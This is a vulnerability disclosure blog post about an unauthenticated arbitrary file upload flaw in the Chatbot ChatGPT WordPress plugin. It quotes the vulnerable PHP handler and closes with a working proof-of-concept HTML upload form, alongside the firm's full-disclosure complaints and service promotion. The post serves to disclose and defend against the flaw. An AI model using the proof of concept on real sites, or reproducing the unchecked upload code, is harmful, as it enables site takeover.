A lot has been made about the possible security risk with code created by ChatGPT whether in WordPress plugins or otherwise. A more pedestrian risk is that WordPress plugins that interact with that are themselves insecure, whether written by ChatGPT or not. Yet again, we have found one of those adding vulnerable code that hackers would exploit.

One way we help to improve the security of WordPress plugins, not just for our customers of our service, but for everyone using them, is our proactive monitoring of changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities. Through that, we caught such a vulnerability being added to Chatbot ChatGPT. The vulnerability, an arbitrary file upload vulnerability, which, as the name suggests, allows an attacker to upload arbitrary files to the website. An attacker could upload a .php file with malicious code and takeover the website.

We now are also running all the code in the plugins used by our customers through that monitoring system on a weekly basis to provide additional protection for them.

The possibility of this vulnerability is also flagged by our Plugin Security Checker, so you can check plugins you use to see if they might have similar issues with that tool.

We tested and confirmed that our firewall plugin for WordPress protected against the vulnerability, even before we discovered the vulnerability, as part of its protection against zero-day vulnerabilities.

Arbitrary File Upload

In version 1.7.6 of the plugin, a new function, chatbot_chatgpt_upload_file_to_assistant(), was added and made accessible through WordPress AJAX functionality to those logged in to WordPress, as well as those not logged in:

447
448

add_action('wp_ajax_chatbot_chatgpt_upload_file_to_assistant', 'chatbot_chatgpt_upload_file_to_assistant');
add_action('wp_ajax_nopriv_chatbot_chatgpt_upload_file_to_assistant', 'chatbot_chatgpt_upload_file_to_assistant');

The function, which is in the file /includes/chatbot-chatgpt-file-upload.php, doesn’t contain any checks to limit what types of files can be uploaded, before saving an uploaded file to the directory /wp-content/plugins/chatbot-chatgpt/uploads/:

17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

function chatbot_chatgpt_upload_file_to_assistant() {
 
    // DIAG - Diagnostic - Ver 1.7.6
    // chatbot_chatgpt_back_trace( 'NOTICE', "Entering chatbot_chatgpt_upload_file_to_assistant()" );
 
    $upload_dir = WP_CONTENT_DIR . '/plugins/chatbot-chatgpt/uploads/';
    $file_path = $upload_dir . basename($_FILES['file']['name']);
 
    // DIAG - Diagnostic - Ver 1.7.6
    // chatbot_chatgpt_back_trace( 'NOTICE', $upload_dir );
    // chatbot_chatgpt_back_trace( 'NOTICE', $file_path );
 
    if (!file_exists($upload_dir)) {
        mkdir($upload_dir, 0777, true); // Create directory if it doesn't exist
    }
 
    // Check if there was an error during the file upload
    if ($_FILES['file']['error'] > 0) {
        // chatbot_chatgpt_back_trace('ERROR', "Error during file upload: " . $_FILES['file']['error']);
    } else {
        if (move_uploaded_file($_FILES['file']['tmp_name'], $file_path)) {

The amount of commented text there is unusual. Is that something generated by an automated coding tool or just the developer’s own unique commenting style?

The rest of the code never removes the file.

WordPress Causes Full Disclosure

As a protest of the moderators of the WordPress Support Forum’s continued inappropriate behavior we changed from reasonably disclosing to full disclosing vulnerabilities for plugins in the WordPress Plugin Directory in protest, until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about that for the developer through the WordPress Support Forum. (For plugins that are also in the ClassicPress Plugin Directory, we will follow our reasonable disclosure policy.)

You can notify the developer of this issue on the forum as well.

After four years, the moderators have finally tacitly admitted they were behaving inappropriately and have made moves to fix the problems (though incompletely), so these full disclosures can be ended if they simply restore access to our accounts and plugins in the Plugin Directory. Hopefully that takes less than four years.

Is It Fixed?

If you are reading this post down the road the best way to find out if this vulnerability or other WordPress plugin vulnerabilities in plugins you use have been fixed is to sign up for our service, since what we uniquely do when it comes to that type of data is to test to see if vulnerabilities have really been fixed. Relying on the developer’s information can lead you astray, as we often find that they believe they have fixed vulnerabilities, but have failed to do that.

Proof of Concept

The following proof of concept will upload the file sent with the request to the directory /wp-content/plugins/chatbot-chatgpt/uploads/.

Replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=chatbot_chatgpt_upload_file_to_assistant" enctype="multipart/form-data" method="POST">
<input type="file" name="file" />
<input type="submit" value="Submit" />
</form>
</body>

Concerned About The Security of the Plugins You Use?

Plugin Security Scorecard Grade for Chatbot ChatGPT

See issues causing the plugin to get less than A+ grade